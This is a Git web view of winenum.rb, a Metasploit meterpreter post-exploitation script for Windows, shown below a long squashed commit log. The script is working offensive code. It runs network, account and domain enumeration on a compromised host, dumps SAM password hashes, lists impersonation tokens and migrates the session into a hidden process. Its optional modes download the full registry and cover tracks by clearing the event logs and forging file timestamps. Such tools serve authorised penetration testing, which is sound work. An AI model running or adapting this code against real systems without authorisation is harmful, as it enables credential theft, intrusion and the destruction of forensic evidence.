adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
06b12bcd7dc2ea93ea6d5cfbcc89d8d48fc0c55f
metasploit-gs/scripts/meterpreter/winenum.rb
T
James Lee 624e19fd8b Merge session-host-rework branch back to master 
Squashed commit of the following:

commit 2f4e8df33c5b4baa8d6fd67b400778a3f93482aa
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 16:31:03 2012 -0700

    Clean up some rdoc comments

    This adds categories for the various interfaces that meterpreter and
    shell sessions implement so they are grouped logically in the docs.

commit 9d31bc1b35845f7279148412f49bda56a39c9d9d
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 13:00:25 2012 -0700

    Combine the docs into one output dir

    There's really no need to separate the API sections into their own
    directory.  Combining them makes it much easier to read.

commit eadd7fc136a9e7e4d9652d55dfb86e6f318332e0
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 08:27:22 2012 -0700

    Keep the order of iface attributes the same accross rubies

    1.8 doesn't maintain insertion order for Hash keys like 1.9 does so we
    end up with ~random order for the display with the previous technique.
    Switch to an Array instead of a Hash so it's always the same.

commit 6f66dd40f39959711f9bacbda99717253a375d21
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 08:23:35 2012 -0700

    Fix a few more compiler warnings

commit f39cb536a80c5000a5b9ca1fec5902300ae4b440
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 08:17:39 2012 -0700

    Fix a type-safety warning

commit 1e52785f38146515409da3724f858b9603d19454
Author: James Lee <egypt@metasploit.com>
Date:   Mon Feb 27 15:21:36 2012 -0700

    LHOST should be OptAddress, not OptAddressRange

commit acef978aa4233c7bd0b00ef63646eb4da5457f67
Author: James Lee <egypt@metasploit.com>
Date:   Sun Feb 26 17:45:59 2012 -0700

    Fix a couple of warnings and a typo

commit 29d87f88790aa1b3e5db6df650ecfb3fb93c675b
Author: HD Moore <hdm@digitaloffense.net>
Date:   Mon Feb 27 11:54:29 2012 -0600

    Fix ctype vs content_type typo

commit 83b5400356c47dd1973e6be3aa343084dfd09c73
Author: Gregory Man <man.gregory@gmail.com>
Date:   Sun Feb 26 15:38:33 2012 +0200

    Fixed scripts/meterpreter/enum_firefox to work with firefox > 3.6.x

commit 49c2c80b347820d02348d694cc71f1b3028b4365
Author: Steve Tornio <swtornio@gmail.com>
Date:   Sun Feb 26 07:13:13 2012 -0600

    add osvdb ref

commit e18e1fe97b89c3a2b8c22bc6c18726853d2c2bee
Author: Matt Andreko <mandreko@gmail.com>
Date:   Sat Feb 25 18:02:56 2012 -0500

    Added aspx target to msfvenom.  This in turn added it to msfencode as well.
    Ref: https://github.com/rapid7/metasploit-framework/pull/188
    Tested on winxp with IIS in .net 1.1 and 2.0 modes

commit e6aa5072112d79bbf8a4d2289cf8d301db3932f5
Author: Joshua J. Drake <github.jdrake@qoop.org>
Date:   Sat Feb 25 13:00:48 2012 -0600

    Fixes #6308: Fall back to 127.0.0.1 when SocketError is raised from the resolver

commit b3371e8bfe
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 17:07:42 2012 -0700

    Simplify logic for whether an inner iface has the same address

commit 5417419f35
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 16:58:16 2012 -0700

    Whitespace

commit 9036875c29
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 16:53:45 2012 -0700

    Set session info before worrying about address

    get_interfaces can take a while on Linux, grab uid and hostname earlier
    so we can give the user an idea of what they popped as soon as possible.

commit f34b51c629
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 16:48:42 2012 -0700

    Clean up rdoc

commit e61a066345
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Feb 28 04:54:45 2012 -0600

    Ensure the architecture is only the first word (not the full WOW64
    message in some cases)

commit 4c70161097
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Feb 28 04:49:17 2012 -0600

    More paranoia code, just in case RHOST is set to whitespace

commit c5ff89fe3d
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Feb 28 04:47:01 2012 -0600

    A few more small bug fixes to handle cases with an empty string target
    host resulting in a bad address

commit 462d0188a1
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Feb 28 03:55:10 2012 -0600

    Fix up the logic (reversed by accident)

commit 2b2b0adaec
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 23:29:52 2012 -0600

    Automatically parse system information and populate the db, identify and
    report NAT when detected, show the real session_host in the sessions -l
    listing

commit 547a4ab4c6
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 22:16:03 2012 -0600

    Fix typo introduced

commit 27a7b7961e
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 22:11:38 2012 -0600

    More session.session_host tweaks

commit e447302a1a
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 22:08:20 2012 -0600

    Additional tunnel_peer changes

commit 93369fcffa
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 22:06:21 2012 -0600

    Additional changes to session.session_host

commit c3552f66d1
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 22:00:19 2012 -0600

    Merge changes into the new branch
2012-02-28 18:29:39 -07:00

657 lines
19 KiB
Ruby
Raw Blame History

# $Id$
# $Revision$
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@client = client
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-m" => [ false, "Migrate the Meterpreter Session from it current process to a new cmd.exe before doing anything" ],
"-r" => [ false, "Dump, compress and download entire Registry" ],
"-c" => [ false, "Change Access, Modified and Created times of executables that were run on the target machine and clear the EventLog" ]
)
rd = nil
mg = nil
cm = nil
opts.parse(args) { |opt, idx, val|
case opt
when '-r'
rd = 1
when '-m'
mg = 1
when '-c'
cm = 1
when "-h"
print_line "WinEnum -- Windows local enumeration"
print_line
print_line "Retrieves all kinds of information about the system"
print_line "including environment variables, network interfaces,"
print_line "routing, user accounts, and much more. Results are"
print_line "stored in #{::File.join(Msf::Config.log_directory,'scripts', 'winenum')}"
print_line(opts.usage)
raise Rex::Script::Completed
end
}
#-------------------------------------------------------------------------------
host,port = @client.session_host, @client.session_port
info = @client.sys.config.sysinfo
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
# Create a directory for the logs
logs = ::File.join(Msf::Config.log_directory,'scripts', 'winenum',Rex::FileUtils.clean_path(info['Computer'] + filenameinfo))
@logfol = logs
# Create the log directory
::FileUtils.mkdir_p(logs)
#log file name
@dest = logs + "/" + Rex::FileUtils.clean_path(info['Computer'] + filenameinfo) + ".txt"
# Commands that will be ran on the Target
commands = [
'cmd.exe /c set',
'arp -a',
'ipconfig /all',
'ipconfig /displaydns',
'route print',
'net view',
'netstat -nao',
'netstat -vb',
'netstat -ns',
'net accounts',
'net accounts /domain',
'net session',
'net share',
'net group',
'net user',
'net localgroup',
'net localgroup administrators',
'net group administrators',
'net view /domain',
'netsh firewall show config',
'tasklist /svc',
'tasklist /m',
'gpresult /SCOPE COMPUTER /Z',
'gpresult /SCOPE USER /Z'
]
# Windows 2008 Commands
win2k8cmd = [
'servermanagercmd.exe -q',
'cscript /nologo winrm get winrm/config',
]
# Commands that MACE will be changed
cmdstomp = [
'cmd.exe',
'reg.exe',
'ipconfig.exe',
'route.exe',
'net.exe',
'netstat.exe',
'netsh.exe',
'makecab.exe',
'tasklist.exe',
'wbem\\wmic.exe',
'gpresult.exe'
]
# WMIC Commands that will be executed on the Target
wmic = [
'useraccount list',
'group list',
'service list brief',
'volume list brief',
'logicaldisk get description,filesystem,name,size',
'netlogin get name,lastlogon,badpasswordcount',
'netclient list brief',
'netuse get name,username,connectiontype,localname',
'share get name,path',
'nteventlog get path,filename,writeable',
'process list brief',
'startup list full',
'rdtoggle list',
'product get name,version',
'qfe',
]
#Specific Commands for Windows vista for Wireless Enumeration
vstwlancmd = [
'netsh wlan show interfaces',
'netsh wlan show drivers',
'netsh wlan show profiles',
'netsh wlan show networks mode=bssid',
]
# Commands that are not present in Windows 2000
nonwin2kcmd = [
'netsh firewall show config',
'tasklist /svc',
'gpresult /SCOPE COMPUTER /Z',
'gpresult /SCOPE USER /Z',
'prnport -l',
'prnmngr -g',
'tasklist.exe',
'wbem\\wmic.exe',
'netsh.exe',
]
# Executables not pressent in Windows 2000
nowin2kexe = [
'netsh.exe',
'gpresult.exe',
'tasklist.exe',
'wbem\\wmic.exe',
]
################## Function Declarations ##################
def findprogs()
print_status("Extracting software list from registry")
proglist = ""
threadnum = 0
a = []
appkeys = ['HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall',
'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' ]
appkeys.each do |keyx86|
soft_keys = registry_enumkeys(keyx86)
if soft_keys
soft_keys.each do |k|
if threadnum < 10
a.push(::Thread.new {
begin
dispnm = registry_getvaldata("#{keyx86}\\#{k}","DisplayName")
dispversion = registry_getvaldata("#{keyx86}\\#{k}","DisplayVersion")
proglist << "#{dispnm},#{dispversion}"
rescue
end
})
threadnum += 1
else
sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
threadnum = 0
end
end
end
end
file_local_write("#{@logfol}/programs_list.csv",proglist)
end
# Function to check if Target Machine a VM
# Note: will add soon Hyper-v and Citrix Xen check.
def chkvm()
check = nil
vmout = ''
info = @client.sys.config.sysinfo
print_status "Checking if #{info['Computer']} is a Virtual Machine ........"
# Check for Target Machines if running in VM, only fo VMware Workstation/Fusion
begin
key = 'HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS'
root_key, base_key = @client.sys.registry.splitkey(key)
open_key = @client.sys.registry.open_key(root_key,base_key,KEY_READ)
v = open_key.query_value('SystemManufacturer')
sysmnfg = v.data.downcase
if sysmnfg =~ /vmware/
print_status "\tThis is a VMware Workstation/Fusion Virtual Machine"
vmout << "This is a VMware Workstation/Fusion Virtual Machine\n\n"
check = 1
elsif sysmnfg =~ /xen/
print_status("\tThis is a Xen Virtual Machine.")
check = 1
end
rescue
end
if check != 1
begin
#Registry path using the HD and CD rom entries in the registry in case propirtary tools are
#not installed.
key2 = "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0"
root_key2, base_key2 = @client.sys.registry.splitkey(key2)
open_key2 = @client.sys.registry.open_key(root_key2,base_key2,KEY_READ)
v2 = open_key2.query_value('Identifier')
if v2.data.downcase =~ /vmware/
print_status "\tThis is a VMWare virtual Machine"
vmout << "This is a VMWare virtual Machine\n\n"
elsif v2.data =~ /vbox/
print_status "\tThis is a Sun VirtualBox virtual Machine"
vmout << "This is a Sun VirtualBox virtual Machine\n\n"
elsif v2.data.downcase =~ /xen/
print_status "\tThis is a Xen virtual Machine"
vmout << "This is a Xen virtual Machine\n\n"
elsif v2.data.downcase =~ /virtual hd/
print_status "\tThis is a Hyper-V/Virtual Server virtual Machine"
vmout << "This is a Hyper-v/Virtual Server virtual Machine\n\n"
end
rescue::Exception => e
end
end
vmout
end
#-------------------------------------------------------------------------------
# Function for running a list a commands stored in a array, return string
def list_exec(cmdlst)
print_status("Running Command List ...")
i = 0
a =[]
@client.response_timeout=120
cmdlst.each do |cmd|
if i < 10
a.push(::Thread.new {
r,cmdout='',""
print_status "\trunning command #{cmd}"
r = @client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
cmdout << d
file_local_write("#{@logfol}/#{cmd.gsub(/(\W)/,"_")}.txt",cmdout)
end
cmdout = ""
r.channel.close
r.close
})
i += 1
else
sleep(0.10) and a.delete_if {|x| not x.alive?} while not a.empty?
i = 0
end
end
a.delete_if {|x| not x.alive?} while not a.empty?
end
#-------------------------------------------------------------------------------
# Function for running a list of WMIC commands stored in a array, returns string
def wmicexec(wmiccmds= nil)
print_status("Running WMIC Commands ....")
i, a = 0, []
@client.response_timeout=120
begin
tmp = @client.fs.file.expand_path("%TEMP%")
wmiccmds.each do |wmi|
if i < 10
a.push(::Thread.new {
tmpout = ''
wmicfl = tmp + "\\#{sprintf("%.5d",rand(100000))}.csv"
print_status "\trunning command wmic #{wmi}"
flname = "#{@logfol}/wmic_#{wmi.gsub(/(\W)/,"_")}.csv"
r = @client.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi} /format:csv", nil, {'Hidden' => true})
sleep(2)
#Making sure that WMIC finishes before executing next WMIC command
prog2check = "wmic.exe"
found = 0
while found == 0
@client.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
sleep(0.5)
found = 0
end
end
end
r.close
# Read output of WMIC
wmioutfile = @client.fs.file.new(wmicfl, "rb")
until wmioutfile.eof?
tmpout << wmioutfile.read
end
wmioutfile.close
# Create file with output of command
filewrt(flname,tmpout)
# Delete created file on disk
begin
@client.fs.file.rm(wmicfl)
rescue
end
})
i += 1
else
sleep(0.01) and a.delete_if {|x| not x.alive?} while not a.empty?
i = 0
end
end
a.delete_if {|x| not x.alive?} while not a.empty?
rescue ::Exception => e
print_status("Error running WMIC commands: #{e.class} #{e}")
end
end
#-------------------------------------------------------------------------------
#Function for getting the NTLM and LANMAN hashes out of a system
def gethash()
print_status("Dumping password hashes...")
begin
hash = ''
@client.core.use("priv")
select(nil, nil, nil, 3)
hashes = @client.priv.sam_hashes
hashes.each do |h|
hash << h.to_s+"\n"
end
hash << "\n\n\n"
print_status("Hashes Dumped")
rescue ::Exception => e
print_status("\tError dumping hashes: #{e.class} #{e}")
print_status("\tPayload may be running with insuficient privileges!")
end
flname = "#{@logfol}/hashdump.txt"
file_local_write(flname,hash)
end
#-------------------------------------------------------------------------------
#Function that uses the incognito features to list tokens on the system that can be used
def listtokens()
begin
print_status("Getting Tokens...")
dt = ''
@client.core.use("incognito")
i = 0
dt << "****************************\n"
dt << " List of Available Tokens\n"
dt << "****************************\n\n"
while i < 2
tokens = @client.incognito.incognito_list_tokens(i)
if i == 0
tType = "User"
else
tType = "Group"
end
dt << "#{tType} Delegation Tokens Available \n"
dt << "======================================== \n"
tokens['delegation'].each_line{ |string|
dt << string + "\n"
}
dt << "\n"
dt << "#{tType} Impersonation Tokens Available \n"
dt << "======================================== \n"
tokens['impersonation'].each_line{ |string|
dt << string + "\n"
}
i += 1
break if i == 2
end
print_status("All tokens have been processed")
rescue ::Exception => e
print_status("Error Getting Tokens: #{e.class} #{e}")
end
file_local_write("#{@logfol}/tokens.txt",dt)
end
#-------------------------------------------------------------------------------
# Function for clearing all event logs
def clrevtlgs()
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]
print_status("Clearing Event Logs, this will leave and event 517")
begin
evtlogs.each do |evl|
print_status("\tClearing the #{evl} Event Log")
log = @client.sys.eventlog.open(evl)
log.clear
file_local_write(@dest,"Cleared the #{evl} Event Log")
end
print_status("All Event Logs have been cleared")
rescue ::Exception => e
print_status("Error clearing Event Log: #{e.class} #{e}")
end
end
#-------------------------------------------------------------------------------
# Function for Changing Access Time, Modified Time and Created Time of Files Supplied in an Array
# The files have to be in %WinDir%\System32 folder.
def chmace(cmds)
windir = ''
print_status("Changing Access Time, Modified Time and Created Time of Files Used")
windir = @client.fs.file.expand_path("%WinDir%")
cmds.each do |c|
begin
@client.core.use("priv")
filetostomp = windir + "\\system32\\"+ c
fl2clone = windir + "\\system32\\chkdsk.exe"
print_status("\tChanging file MACE attributes on #{filetostomp}")
@client.priv.fs.set_file_mace_from_file(filetostomp, fl2clone)
file_local_write(@dest,"Changed MACE of #{filetostomp}")
rescue ::Exception => e
print_status("Error changing MACE: #{e.class} #{e}")
end
end
end
#-------------------------------------------------------------------------------
#Dumping and Downloading the Registry of the target machine
def regdump(pathoflogs,filename)
host,port = @client.session_host, @client.session_port
#This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
garbage = ''
hives = %w{HKCU HKLM HKCC HKCR HKU}
windir = @client.fs.file.expand_path("%WinDir%")
print_status('Dumping and Downloading the Registry')
hives.each do |hive|
begin
print_status("\tExporting #{hive}")
r = @client.sys.process.execute("cmd.exe /c reg.exe export #{hive} #{windir}\\Temp\\#{hive}#{filename}.reg", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
garbage << d
end
r.channel.close
r.close
print_status("\tCompressing #{hive} into cab file for faster download")
r = @client.sys.process.execute("cmd.exe /c makecab #{windir}\\Temp\\#{hive}#{filename}.reg #{windir}\\Temp\\#{hive}#{filename}.cab", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
garbage << d
end
r.channel.close
r.close
rescue ::Exception => e
print_status("Error dumping Registry Hives #{e.class} #{e}")
end
end
#Downloading compressed registry Hives
hives.each do |hive|
begin
print_status("\tDownloading #{hive}#{filename}.cab to -> #{pathoflogs}/#{host}-#{hive}#{filename}.cab")
@client.fs.file.download_file("#{pathoflogs}/#{host}-#{hive}#{filename}.cab", "#{windir}\\Temp\\#{hive}#{filename}.cab")
file_local_write(@dest,"Dumped and Downloaded #{hive} Registry Hive")
sleep(5)
rescue ::Exception => e
print_status("Error Downloading Registry Hives #{e.class} #{e}")
end
end
#Deleting left over files
print_status("\tDeleting left over files")
@client.sys.process.execute("cmd.exe /c del #{windir}\\Temp\\HK*", nil, {'Hidden' => 'true'})
end
#-------------------------------------------------------------------------------
# Function that will call 2 other Functions to cover all tracks
def covertracks(cmdstomp)
clrevtlgs()
info = @client.sys.config.sysinfo
trgtos = info['OS']
if trgtos =~ /(Windows 2000)/
chmace(cmdstomp - nonwin2kcmd)
else
chmace(cmdstomp)
end
end
#-------------------------------------------------------------------------------
# Functions Provided by natron (natron 0x40 invisibledenizen 0x2E com)
# for Process Migration
#---------------------------------------------------------------------------------------------------------
def launchProc(target)
print_status("Launching hidden #{target}...")
# Set the vars; these can of course be modified if need be
cmd_exec = target
cmd_args = nil
hidden = true
channelized = nil
use_thread_token = false
# Launch new process
newproc = @client.sys.process.execute(cmd_exec, cmd_args,
'Channelized' => channelized,
'Hidden' => hidden,
'InMemory' => nil,
'UseThreadToken' => use_thread_token)
print_status("Process #{newproc.pid} created.")
return newproc
end
#-------------------------------------------------------------------------------
def migrateToProc(newproc)
# Grab the current pid info
server = @client.sys.process.open
print_status("Current process is #{server.name} (#{server.pid}). Migrating to #{newproc.pid}.")
# Save the old process info so we can kill it after migration.
oldproc = server.pid
# Do the migration
@client.core.migrate(newproc.pid.to_i)
print_status("Migration completed successfully.")
# Grab new process info
server = @client.sys.process.open
print_status("New server process: #{server.name} (#{server.pid})")
return oldproc
end
#-------------------------------------------------------------------------------
def killApp(procpid)
@client.sys.process.kill(procpid)
print_status("Old process #{procpid} killed.")
end
#---------------------------------------------------------------------------------------------------------
# Function to execute process migration
def migrate()
target = 'cmd.exe'
newProcPid = launchProc(target)
oldProc = migrateToProc(newProcPid)
#killApp(oldProc)
#Dangerous depending on the service exploited
end
#---------------------------------------------------------------------------------------------------------
#Function for Checking for UAC
def uaccheck()
uac = is_uac_enabled?
if uac
print_status("\tUAC is Enabled")
else
print_status("\tUAC is Disabled")
end
return uac
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
unsupported if client.platform !~ /win32|win64/i
################## MAIN ##################
# Execute Functions selected
if (mg != nil)
migrate()
end
# Main part of script, it will run all function minus the ones
# that will chance the MACE and Clear the Event log.
print_status("Running Windows Local Enumerion Meterpreter Script")
print_status("New session on #{host}:#{port}...")
# Header for File that will hold all the output of the commands
info = @client.sys.config.sysinfo
header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
header << "Running as: #{@client.sys.config.getuid}\n"
header << "Host: #{info['Computer']}\n"
header << "OS: #{info['OS']}\n"
header << "\n\n\n"
print_status("Saving general report to #{@dest}")
print_status("Output of each individual command is saved to #{@logfol}")
file_local_write(@dest,header)
file_local_write(@dest,chkvm())
trgtos = info['OS']
uac = uaccheck()
# Run Commands according to OS some commands are not available on all versions of Windows
if trgtos =~ /(Windows XP)/
if trgtos =~ /(2600, \)|2600, Service Pack 1\))/
commands.delete('netstat -vb')
commands.delete('netsh firewall show config')
end
list_exec(commands)
wmicexec(wmic)
findprogs()
gethash()
elsif trgtos =~ /(Windows .NET)/
list_exec(commands)
wmicexec(wmic)
findprogs()
gethash()
elsif trgtos =~ /(Windows 2008)/
list_exec(commands + win2k8cmd)
wmicexec(wmic)
findprogs()
if not is_system?
print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.")
else
gethash()
end
elsif trgtos =~ /Windows (Vista|7)/
list_exec(commands + vstwlancmd)
# Check for UAC and save results
if uac
file_local_write(@dest,"UAC is Enabled")
else
file_local_write(@dest,"UAC is Disabled")
end
wmicexec(wmic)
findprogs()
if not is_system?
print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.")
else
gethash()
end
elsif trgtos =~ /(Windows 2000)/
list_exec(commands - nonwin2kcmd)
gethash()
end
listtokens()
if (rd != nil)
if not uac
regdump(logs,filenameinfo)
else
print_status("UAC is enabled, Registry Keys could not be dumped under current privileges")
end
end
if (cm != nil)
if trgtos =~ /(Windows 2000)/
covertracks(cmdstomp - nowin2kexe)
else
if not uac
covertracks(cmdstomp)
else
print_status("UAC is enabled, Logs could not be cleared under current privileges")
end
end
end
print_status("Done!")
Reference in New Issue View Git Blame Copy Permalink